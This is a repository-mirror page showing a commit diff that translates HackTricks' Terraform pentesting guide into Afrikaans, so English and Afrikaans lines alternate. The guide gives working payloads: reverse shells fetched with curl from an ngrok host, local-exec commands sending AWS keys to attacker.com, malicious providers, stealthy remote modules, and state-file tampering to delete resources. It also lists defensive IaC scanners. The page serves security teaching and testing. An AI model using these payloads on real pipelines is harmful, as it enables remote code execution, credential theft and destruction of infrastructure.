gitea-mirror/hacktricks-cloud
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks-cloud.git synced 2026-01-27 15:24:32 -08:00
Code Issues Packages Projects Releases Wiki Activity

Translated ['src/README.md', 'src/banners/hacktricks-training.md', 'src/

Browse Source
This commit is contained in:
Translator
2024-12-31 20:29:08 +00:00
parent 2753c75e8b
commit 396dbafaf2
245 changed files with 9878 additions and 12609 deletions
Download Patch File Download Diff File Expand all files Collapse all files

280
src/pentesting-ci-cd/terraform-security.md
View File

@@ -6,303 +6,273 @@
[From the docs:](https://developer.hashicorp.com/terraform/intro)
HashiCorp Terraform is an **infrastructure as code tool** that lets you define both **cloud and on-prem resources** in human-readable configuration files that you can version, reuse, and share. You can then use a consistent workflow to provision and manage all of your infrastructure throughout its lifecycle. Terraform can manage low-level components like compute, storage, and networking resources, as well as high-level components like DNS entries and SaaS features.
HashiCorp Terraform is 'n **infrastruktuur as kode hulpmiddel** wat jou toelaat om beide **cloud en op-prem hulpbronne** in menslike leesbare konfigurasie lêers te definieer wat jy kan weergawe, hergebruik en deel. Jy kan dan 'n konsekwente werksvloei gebruik om al jou infrastruktuur deur sy lewensiklus te voorsien en te bestuur. Terraform kan lae-vlak komponente soos rekenaar, stoor en netwerk hulpbronne bestuur, sowel as hoë-vlak komponente soos DNS inskrywings en SaaS funksies.
#### How does Terraform work?
Terraform creates and manages resources on cloud platforms and other services through their application programming interfaces (APIs). Providers enable Terraform to work with virtually any platform or service with an accessible API.
Terraform skep en bestuur hulpbronne op cloud platforms en ander dienste deur hul toepassingsprogrammeringsinterfaces (API's). Verskaffers stel Terraform in staat om met feitlik enige platform of diens met 'n toeganklike API te werk.
![](<../images/image (177).png>)
HashiCorp and the Terraform community have already written **more than 1700 providers** to manage thousands of different types of resources and services, and this number continues to grow. You can find all publicly available providers on the [Terraform Registry](https://registry.terraform.io/), including Amazon Web Services (AWS), Azure, Google Cloud Platform (GCP), Kubernetes, Helm, GitHub, Splunk, DataDog, and many more.
HashiCorp en die Terraform gemeenskap het reeds **meer as 1700 verskaffers** geskryf om duisende verskillende tipes hulpbronne en dienste te bestuur, en hierdie getal hou aan om te groei. Jy kan al die publiek beskikbare verskaffers op die [Terraform Registry](https://registry.terraform.io/) vind, insluitend Amazon Web Services (AWS), Azure, Google Cloud Platform (GCP), Kubernetes, Helm, GitHub, Splunk, DataDog, en nog baie meer.
The core Terraform workflow consists of three stages:
Die kern Terraform werksvloei bestaan uit drie fases:
- **Write:** You define resources, which may be across multiple cloud providers and services. For example, you might create a configuration to deploy an application on virtual machines in a Virtual Private Cloud (VPC) network with security groups and a load balancer.
- **Plan:** Terraform creates an execution plan describing the infrastructure it will create, update, or destroy based on the existing infrastructure and your configuration.
- **Apply:** On approval, Terraform performs the proposed operations in the correct order, respecting any resource dependencies. For example, if you update the properties of a VPC and change the number of virtual machines in that VPC, Terraform will recreate the VPC before scaling the virtual machines.
- **Write:** Jy definieer hulpbronne, wat oor verskeie cloud verskaffers en dienste mag wees. Byvoorbeeld, jy mag 'n konfigurasie skep om 'n toepassing op virtuele masjiene in 'n Virtuele Privaat Cloud (VPC) netwerk met sekuriteitsgroepe en 'n laaibalans te ontplooi.
- **Plan:** Terraform skep 'n uitvoeringsplan wat die infrastruktuur beskryf wat dit sal skep, opdateer of vernietig gebaseer op die bestaande infrastruktuur en jou konfigurasie.
- **Apply:** Op goedkeuring, voer Terraform die voorgestelde operasies in die korrekte volgorde uit, terwyl dit enige hulpbron afhanklikhede respekteer. Byvoorbeeld, as jy die eienskappe van 'n VPC opdateer en die aantal virtuele masjiene in daardie VPC verander, sal Terraform die VPC weer skep voordat dit die virtuele masjiene skaal.
![](<../images/image (215).png>)
### Terraform Lab
Just install terraform in your computer.
Installeer eenvoudig terraform op jou rekenaar.
Here you have a [guide](https://learn.hashicorp.com/tutorials/terraform/install-cli) and here you have the [best way to download terraform](https://www.terraform.io/downloads).
Hier het jy 'n [gids](https://learn.hashicorp.com/tutorials/terraform/install-cli) en hier het jy die [beste manier om terraform af te laai](https://www.terraform.io/downloads).
## RCE in Terraform
Terraform **doesn't have a platform exposing a web page or a network service** we can enumerate, therefore, the only way to compromise terraform is to **be able to add/modify terraform configuration files**.
Terraform **het nie 'n platform wat 'n webblad of 'n netwerkdiens blootstel** wat ons kan opnoem nie, daarom is die enigste manier om terraform te kompromitteer om **in staat te wees om terraform konfigurasie lêers by te voeg/wysig**.
However, terraform is a **very sensitive component** to compromise because it will have **privileged access** to different locations so it can work properly.
Egter, terraform is 'n **baie sensitiewe komponent** om te kompromitteer omdat dit **bevoorregte toegang** tot verskillende plekke sal hê sodat dit behoorlik kan werk.
The main way for an attacker to be able to compromise the system where terraform is running is to **compromise the repository that stores terraform configurations**, because at some point they are going to be **interpreted**.
Die hoof manier vir 'n aanvaller om in staat te wees om die stelsel waar terraform loop te kompromitteer, is om **die repo te kompromitteer wat terraform konfigurasies stoor**, omdat dit op 'n stadium **geïterpreteer** gaan word.
Actually, there are solutions out there that **execute terraform plan/apply automatically after a PR** is created, such as **Atlantis**:
Werklik, daar is oplossings daar buite wat **automaties terraform plan/apply uitvoer nadat 'n PR** geskep is, soos **Atlantis**:
{{#ref}}
atlantis-security.md
{{#endref}}
If you are able to compromise a terraform file there are different ways you can perform RCE when someone executed `terraform plan` or `terraform apply`.
As jy in staat is om 'n terraform lêer te kompromitteer, is daar verskillende maniere waarop jy RCE kan uitvoer wanneer iemand `terraform plan` of `terraform apply` uitvoer.
### Terraform plan
Terraform plan is the **most used command** in terraform and developers/solutions using terraform call it all the time, so the **easiest way to get RCE** is to make sure you poison a terraform config file that will execute arbitrary commands in a `terraform plan`.
Terraform plan is die **mees gebruikte opdrag** in terraform en ontwikkelaars/oplossings wat terraform gebruik, noem dit heeltyd, so die **gemaklikste manier om RCE te kry** is om te verseker dat jy 'n terraform konfigurasie lêer vergiftig wat arbitrêre opdragte in 'n `terraform plan` sal uitvoer.
**Using an external provider**
Terraform offers the [`external` provider](https://registry.terraform.io/providers/hashicorp/external/latest/docs) which provides a way to interface between Terraform and external programs. You can use the `external` data source to run arbitrary code during a `plan`.
Injecting in a terraform config file something like the following will execute a rev shell when executing `terraform plan`:
Terraform bied die [`external` provider](https://registry.terraform.io/providers/hashicorp/external/latest/docs) wat 'n manier bied om tussen Terraform en eksterne programme te kommunikeer. Jy kan die `external` data bron gebruik om arbitrêre kode tydens 'n `plan` uit te voer.
Om iets soos die volgende in 'n terraform konfigurasie lêer in te voeg, sal 'n rev shell uitvoer wanneer jy `terraform plan` uitvoer:
```javascript
data "external" "example" {
program = ["sh", "-c", "curl https://reverse-shell.sh/8.tcp.ngrok.io:12946 | sh"]
program = ["sh", "-c", "curl https://reverse-shell.sh/8.tcp.ngrok.io:12946 | sh"]
}
```
**Gebruik van 'n pasgemaakte verskaffer**
**Using a custom provider**
An attacker could send a [custom provider](https://learn.hashicorp.com/tutorials/terraform/provider-setup) to the [Terraform Registry](https://registry.terraform.io/) and then add it to the Terraform code in a feature branch ([example from here](https://alex.kaskaso.li/post/terraform-plan-rce)):
'n Aanvaller kan 'n [pasgemaakte verskaffer](https://learn.hashicorp.com/tutorials/terraform/provider-setup) na die [Terraform Registry](https://registry.terraform.io/) stuur en dit dan by die Terraform-kode in 'n kenmerk tak voeg ([voorbeeld hier](https://alex.kaskaso.li/post/terraform-plan-rce)):
```javascript
terraform {
required_providers {
evil = {
source = "evil/evil"
version = "1.0"
}
}
}
terraform {
required_providers {
evil = {
source = "evil/evil"
version = "1.0"
}
}
}
provider "evil" {}
```
Die verskaffer word afgelaai in die `init` en sal die kwaadwillige kode uitvoer wanneer `plan` uitgevoer word.
The provider is downloaded in the `init` and will run the malicious code when `plan` is executed
Jy kan 'n voorbeeld vind in [https://github.com/rung/terraform-provider-cmdexec](https://github.com/rung/terraform-provider-cmdexec)
You can find an example in [https://github.com/rung/terraform-provider-cmdexec](https://github.com/rung/terraform-provider-cmdexec)
**Gebruik 'n eksterne verwysing**
**Using an external reference**
Both mentioned options are useful but not very stealthy (the second is more stealthy but more complex than the first one). You can perform this attack even in a **stealthier way**, by following this suggestions:
- Instead of adding the rev shell directly into the terraform file, you can **load an external resource** that contains the rev shell:
Albei genoemde opsies is nuttig, maar nie baie stil nie (die tweede is stilser, maar meer kompleks as die eerste een). Jy kan hierdie aanval selfs op 'n **stilser manier** uitvoer deur hierdie voorstelle te volg:
- In plaas daarvan om die rev shell direk in die terraform-lêer by te voeg, kan jy **'n eksterne hulpbron laai** wat die rev shell bevat:
```javascript
module "not_rev_shell" {
source = "git@github.com:carlospolop/terraform_external_module_rev_shell//modules"
source = "git@github.com:carlospolop/terraform_external_module_rev_shell//modules"
}
```
You can find the rev shell code in [https://github.com/carlospolop/terraform_external_module_rev_shell/tree/main/modules](https://github.com/carlospolop/terraform_external_module_rev_shell/tree/main/modules)
- In the external resource, use the **ref** feature to hide the **terraform rev shell code in a branch** inside of the repo, something like: `git@github.com:carlospolop/terraform_external_module_rev_shell//modules?ref=b401d2b`
- In die eksterne hulpbron, gebruik die **ref** kenmerk om die **terraform rev shell kode in 'n tak** binne die repo te verberg, iets soos: `git@github.com:carlospolop/terraform_external_module_rev_shell//modules?ref=b401d2b`
### Terraform Apply
Terraform apply will be executed to apply all the changes, you can also abuse it to obtain RCE injecting **a malicious Terraform file with** [**local-exec**](https://www.terraform.io/docs/provisioners/local-exec.html)**.**\
You just need to make sure some payload like the following ones ends in the `main.tf` file:
Terraform apply sal uitgevoer word om al die veranderinge toe te pas, jy kan dit ook misbruik om RCE te verkry deur **'n kwaadwillige Terraform-lêer met** [**local-exec**](https://www.terraform.io/docs/provisioners/local-exec.html)**.**\
Jy moet net seker maak dat 'n payload soos die volgende in die `main.tf` lêer eindig:
```json
// Payload 1 to just steal a secret
resource "null_resource" "secret_stealer" {
provisioner "local-exec" {
command = "curl https://attacker.com?access_key=$AWS_ACCESS_KEY&secret=$AWS_SECRET_KEY"
}
provisioner "local-exec" {
command = "curl https://attacker.com?access_key=$AWS_ACCESS_KEY&secret=$AWS_SECRET_KEY"
}
}
// Payload 2 to get a rev shell
resource "null_resource" "rev_shell" {
provisioner "local-exec" {
command = "sh -c 'curl https://reverse-shell.sh/8.tcp.ngrok.io:12946 | sh'"
}
provisioner "local-exec" {
command = "sh -c 'curl https://reverse-shell.sh/8.tcp.ngrok.io:12946 | sh'"
}
}
```
Follow the **suggestions from the previous technique** the perform this attack in a **stealthier way using external references**.
Volg die **voorstelle van die vorige tegniek** om hierdie aanval op 'n **stealthier manier met eksterne verwysings** uit te voer.
## Secrets Dumps
You can have **secret values used by terraform dumped** running `terraform apply` by adding to the terraform file something like:
Jy kan **geheime waardes wat deur terraform gebruik word, laat dump** deur `terraform apply` te loop deur iets soos die volgende aan die terraform-lêer toe te voeg:
```json
output "dotoken" {
value = nonsensitive(var.do_token)
value = nonsensitive(var.do_token)
}
```
## Misbruik van Terraform Toestand Lêers
## Abusing Terraform State Files
In die geval dat jy skryfreëls oor terraform toestand lêers het, maar nie die terraform kode kan verander nie, [**hierdie navorsing**](https://blog.plerion.com/hacking-terraform-state-privilege-escalation/) bied 'n paar interessante opsies om voordeel te trek uit die lêer:
In case you have write access over terraform state files but cannot change the terraform code, [**this research**](https://blog.plerion.com/hacking-terraform-state-privilege-escalation/) gives some interesting options to take advantage of the file:
### Verwydering van hulpbronne <a href="#deleting-resources" id="deleting-resources"></a>
### Deleting resources <a href="#deleting-resources" id="deleting-resources"></a>
Daar is 2 maniere om hulpbronne te vernietig:
There are 2 ways to destroy resources:
1. **Insert a resource with a random name into the state file pointing to the real resource to destroy**
Because terraform will see that the resource shouldn't exit, it'll destroy it (following the real resource ID indicated). Example from the previous page:
1. **Voeg 'n hulpbron met 'n ewekansige naam by die toestand lêer wat na die werklike hulpbron verwys om te vernietig**
Omdat terraform sal sien dat die hulpbron nie behoort te bestaan nie, sal dit dit vernietig (volgens die werklike hulpbron ID wat aangedui word). Voorbeeld van die vorige bladsy:
```json
{
"mode": "managed",
"type": "aws_instance",
"name": "example",
"provider": "provider[\"registry.terraform.io/hashicorp/aws\"]",
"instances": [
{
"attributes": {
"id": "i-1234567890abcdefg"
}
}
]
"mode": "managed",
"type": "aws_instance",
"name": "example",
"provider": "provider[\"registry.terraform.io/hashicorp/aws\"]",
"instances": [
{
"attributes": {
"id": "i-1234567890abcdefg"
}
}
]
},
```
2. **Wysig die hulpbron om te verwyder op 'n manier dat dit nie moontlik is om op te dateer nie (sodat dit verwyder en weer geskep sal word)**
2. **Modify the resource to delete in a way that it's not possible to update (so it'll be deleted a recreated)**
For an EC2 instance, modifying the type of the instance is enough to make terraform delete a recreate it.
Vir 'n EC2-instantie is dit genoeg om die tipe van die instantie te wysig sodat terraform dit verwyder en weer skep.
### RCE
It's also possible to [create a custom provider](https://developer.hashicorp.com/terraform/tutorials/providers-plugin-framework/providers-plugin-framework-provider) and just replace one of the providers in the terraform state file for the malicious one or add an empty resource with the malicious provider. Example from the original research:
Dit is ook moontlik om [n pasgemaakte verskaffer te skep](https://developer.hashicorp.com/terraform/tutorials/providers-plugin-framework/providers-plugin-framework-provider) en net een van die verskaffers in die terraform toestandlêer te vervang met die kwaadwillige een of 'n leë hulpbron met die kwaadwillige verskaffer by te voeg. Voorbeeld uit die oorspronklike navorsing:
```json
"resources": [
{
"mode": "managed",
"type": "scaffolding_example",
"name": "example",
"provider": "provider[\"registry.terraform.io/dagrz/terrarizer\"]",
"instances": [
"mode": "managed",
"type": "scaffolding_example",
"name": "example",
"provider": "provider[\"registry.terraform.io/dagrz/terrarizer\"]",
"instances": [
]
]
},
```
### Vervang geblacklisted verskaffer
### Replace blacklisted provider
In case you encounter a situation where `hashicorp/external` was blacklisted, you can re-implement the `external` provider by doing the following. Note: We use a fork of external provider published by https://registry.terraform.io/providers/nazarewk/external/latest. You can publish your own fork or re-implementation as well.
In die geval dat jy 'n situasie teëkom waar `hashicorp/external` geblacklisted was, kan jy die `external` verskaffer herimplementer deur die volgende te doen. Let wel: Ons gebruik 'n fork van die eksterne verskaffer gepubliseer deur https://registry.terraform.io/providers/nazarewk/external/latest. Jy kan jou eie fork of herimplementering ook publiseer.
```terraform
terraform {
required_providers {
external = {
source = "nazarewk/external"
version = "3.0.0"
}
}
required_providers {
external = {
source = "nazarewk/external"
version = "3.0.0"
}
}
}
```
Then you can use `external` as per normal.
Dan kan jy `external` soos normaal gebruik.
```terraform
data "external" "example" {
program = ["sh", "-c", "whoami"]
program = ["sh", "-c", "whoami"]
}
```
## Outomatiese Oudit Gereedskap
## Automatic Audit Tools
### [**Snyk Infrastruktur as Kode (IaC)**](https://snyk.io/product/infrastructure-as-code-security/)
### [**Snyk Infrastructure as Code (IaC)**](https://snyk.io/product/infrastructure-as-code-security/)
Snyk offers a comprehensive Infrastructure as Code (IaC) scanning solution that detects vulnerabilities and misconfigurations in Terraform, CloudFormation, Kubernetes, and other IaC formats.
- **Features:**
- Real-time scanning for security vulnerabilities and compliance issues.
- Integration with version control systems (GitHub, GitLab, Bitbucket).
- Automated fix pull requests.
- Detailed remediation advice.
- **Sign Up:** Create an account on [Snyk](https://snyk.io/).
Snyk bied 'n omvattende Infrastruktur as Kode (IaC) skandeeroplossing wat kwesbaarhede en verkeerde konfigurasies in Terraform, CloudFormation, Kubernetes, en ander IaC formate opspoor.
- **Kenmerke:**
- Regs-tijd skandering vir sekuriteitskwesbaarhede en nakomingskwessies.
- Integrasie met weergawebeheer stelsels (GitHub, GitLab, Bitbucket).
- Outomatiese regstelling trek versoeke.
- Gedetailleerde hersteladvies.
- **Teken In:** Skep 'n rekening op [Snyk](https://snyk.io/).
```bash
brew tap snyk/tap
brew install snyk
snyk auth
snyk iac test /path/to/terraform/code
```
### [Checkov](https://github.com/bridgecrewio/checkov) <a href="#install-checkov-from-pypi" id="install-checkov-from-pypi"></a>
**Checkov** is a static code analysis tool for infrastructure as code (IaC) and also a software composition analysis (SCA) tool for images and open source packages.
**Checkov** is 'n statiese kode analise hulpmiddel vir infrastruktuur as kode (IaC) en ook 'n sagteware samestelling analise (SCA) hulpmiddel vir beelde en oopbron pakkette.
It scans cloud infrastructure provisioned using [Terraform](https://terraform.io/), [Terraform plan](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/Terraform%20Plan%20Scanning.md), [Cloudformation](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/Cloudformation.md), [AWS SAM](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/AWS%20SAM.md), [Kubernetes](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/Kubernetes.md), [Helm charts](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/Helm.md), [Kustomize](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/Kustomize.md), [Dockerfile](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/Dockerfile.md), [Serverless](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/Serverless%20Framework.md), [Bicep](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/Bicep.md), [OpenAPI](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/OpenAPI.md), [ARM Templates](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/Azure%20ARM%20templates.md), or [OpenTofu](https://opentofu.org/) and detects security and compliance misconfigurations using graph-based scanning.
It performs [Software Composition Analysis (SCA) scanning](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/Sca.md) which is a scan of open source packages and images for Common Vulnerabilities and Exposures (CVEs).
Dit skandeer wolk infrastruktuur wat voorsien is met behulp van [Terraform](https://terraform.io/), [Terraform plan](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/Terraform%20Plan%20Scanning.md), [Cloudformation](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/Cloudformation.md), [AWS SAM](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/AWS%20SAM.md), [Kubernetes](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/Kubernetes.md), [Helm charts](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/Helm.md), [Kustomize](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/Kustomize.md), [Dockerfile](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/Dockerfile.md), [Serverless](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/Serverless%20Framework.md), [Bicep](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/Bicep.md), [OpenAPI](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/OpenAPI.md), [ARM Templates](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/Azure%20ARM%20templates.md), of [OpenTofu](https://opentofu.org/) en detecteer sekuriteits- en nakomingsmisconfigurasies met behulp van graf-gebaseerde skandering.
Dit voer [Sagteware Samestelling Analise (SCA) skandering](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/Sca.md) uit wat 'n skandering van oopbron pakkette en beelde vir Algemene Kw vulnerabilities en Blootstellings (CVEs) is.
```bash
pip install checkov
checkov -d /path/to/folder
```
### [terraform-compliance](https://github.com/terraform-compliance/cli)
From the [**docs**](https://github.com/terraform-compliance/cli): `terraform-compliance` is a lightweight, security and compliance focused test framework against terraform to enable negative testing capability for your infrastructure-as-code.
From the [**docs**](https://github.com/terraform-compliance/cli): `terraform-compliance` is 'n liggewig, sekuriteit en nakoming gefokusde toetsraamwerk teenoor terraform om negatiewe toetsing vermoë vir jou infrastruktuur-as-kode moontlik te maak.
- **compliance:** Ensure the implemented code is following security standards, your own custom standards
- **behaviour driven development:** We have BDD for nearly everything, why not for IaC ?
- **portable:** just install it from `pip` or run it via `docker`. See [Installation](https://terraform-compliance.com/pages/installation/)
- **pre-deploy:** it validates your code before it is deployed
- **easy to integrate:** it can run in your pipeline (or in git hooks) to ensure all deployments are validated.
- **segregation of duty:** you can keep your tests in a different repository where a separate team is responsible.
- **compliance:** Verseker dat die geïmplementeerde kode sekuriteitsstandaarde en jou eie pasgemaakte standaarde volg
- **behaviour driven development:** Ons het BDD vir byna alles, hoekom nie vir IaC nie?
- **portable:** installeer dit net vanaf `pip` of hardloop dit via `docker`. Sien [Installation](https://terraform-compliance.com/pages/installation/)
- **pre-deploy:** dit valideer jou kode voordat dit ontplooi word
- **easy to integrate:** dit kan in jou pyplyn (of in git hooks) hardloop om te verseker dat alle ontplooiings gevalideer word.
- **segregation of duty:** jy kan jou toetse in 'n ander repository hou waar 'n aparte span verantwoordelik is.
> [!NOTE]
> Unfortunately if the code is using some providers you don't have access to you won't be able to perform the `terraform plan` and run this tool.
> Ongelukkig, as die kode sommige verskaffers gebruik waartoe jy nie toegang het nie, sal jy nie in staat wees om die `terraform plan` uit te voer en hierdie hulpmiddel te gebruik nie.
```bash
pip install terraform-compliance
terraform plan -out=plan.out
terraform-compliance -f /path/to/folder
```
### [tfsec](https://github.com/aquasecurity/tfsec)
From the [**docs**](https://github.com/aquasecurity/tfsec): tfsec uses static analysis of your terraform code to spot potential misconfigurations.
- ☁️ Checks for misconfigurations across all major (and some minor) cloud providers
- ⛔ Hundreds of built-in rules
- 🪆 Scans modules (local and remote)
- Evaluates HCL expressions as well as literal values
- ↪️ Evaluates Terraform functions e.g. `concat()`
- 🔗 Evaluates relationships between Terraform resources
- 🧰 Compatible with the Terraform CDK
- 🙅 Applies (and embellishes) user-defined Rego policies
- 📃 Supports multiple output formats: lovely (default), JSON, SARIF, CSV, CheckStyle, JUnit, text, Gif.
- 🛠️ Configurable (via CLI flags and/or config file)
- ⚡ Very fast, capable of quickly scanning huge repositories
From the [**docs**](https://github.com/aquasecurity/tfsec): tfsec gebruik statiese analise van jou terraform kode om potensiële miskonfigurasies op te spoor.
- ☁️ Kontroleer vir miskonfigurasies oor alle groot (en sommige klein) wolkverskaffers
- ⛔ Honderde ingeboude reëls
- 🪆 Skandeer modules (plaaslik en afstand)
- Evalueer HCL-uitdrukkings sowel as letterlike waardes
- ↪️ Evalueer Terraform funksies bv. `concat()`
- 🔗 Evalueer verhoudings tussen Terraform hulpbronne
- 🧰 Kompatibel met die Terraform CDK
- 🙅 Pas (en versier) gebruiker-gedefinieerde Rego-beleide toe
- 📃 Ondersteun verskeie uitvoerformate: pragtig (verstek), JSON, SARIF, CSV, CheckStyle, JUnit, teks, Gif.
- 🛠️ Konfigureerbaar (via CLI-vlaggies en/of konfigurasie lêer)
- ⚡ Baie vinnig, in staat om vinnig enorme repositories te skandeer
```bash
brew install tfsec
tfsec /path/to/folder
```
### [KICKS](https://github.com/Checkmarx/kics)
Find security vulnerabilities, compliance issues, and infrastructure misconfigurations early in the development cycle of your infrastructure-as-code with **KICS** by Checkmarx.
**KICS** stands for **K**eeping **I**nfrastructure as **C**ode **S**ecure, it is open source and is a must-have for any cloud native project.
Vind sekuriteitskwesbaarhede, nakomingskwessies en infrastruktuur miskonfigurasies vroeg in die ontwikkelingsiklus van jou infrastruktuur-as-kode met **KICS** deur Checkmarx.
**KICS** staan vir **K**eeping **I**nfrastructure as **C**ode **S**ecure, dit is oopbron en is 'n moet-hê vir enige wolk-natiewe projek.
```bash
docker run -t -v $(pwd):/path checkmarx/kics:latest scan -p /path -o "/path/"
```
### [Terrascan](https://github.com/tenable/terrascan)
From the [**docs**](https://github.com/tenable/terrascan): Terrascan is a static code analyzer for Infrastructure as Code. Terrascan allows you to:
- Seamlessly scan infrastructure as code for misconfigurations.
- Monitor provisioned cloud infrastructure for configuration changes that introduce posture drift, and enables reverting to a secure posture.
- Detect security vulnerabilities and compliance violations.
- Mitigate risks before provisioning cloud native infrastructure.
- Offers flexibility to run locally or integrate with your CI\CD.
Van die [**docs**](https://github.com/tenable/terrascan): Terrascan is 'n statiese kode-analiseerder vir Infrastruktur as Kode. Terrascan stel jou in staat om:
- Naadloos infrastruktuur as kode te skandeer vir verkeerde konfigurasies.
- Geprovisioneerde wolkinfrastruktuur te monitor vir konfigurasiewijzigings wat posisie-afwykings inbring, en stel jou in staat om na 'n veilige posisie terug te keer.
- Sekuriteitskwesbaarhede en nakomingsoortredings te ontdek.
- Risiko's te verminder voordat wolk-natiewe infrastruktuur geprovisioneer word.
- Bied buigsaamheid om plaaslik te loop of te integreer met jou CI\CD.
```bash
brew install terrascan
```
## References
## Verwysings
- [Atlantis Security](atlantis-security.md)
- [https://alex.kaskaso.li/post/terraform-plan-rce](https://alex.kaskaso.li/post/terraform-plan-rce)
@@ -310,7 +280,3 @@ brew install terrascan
- [https://blog.plerion.com/hacking-terraform-state-privilege-escalation/](https://blog.plerion.com/hacking-terraform-state-privilege-escalation/)
{{#include ../banners/hacktricks-training.md}}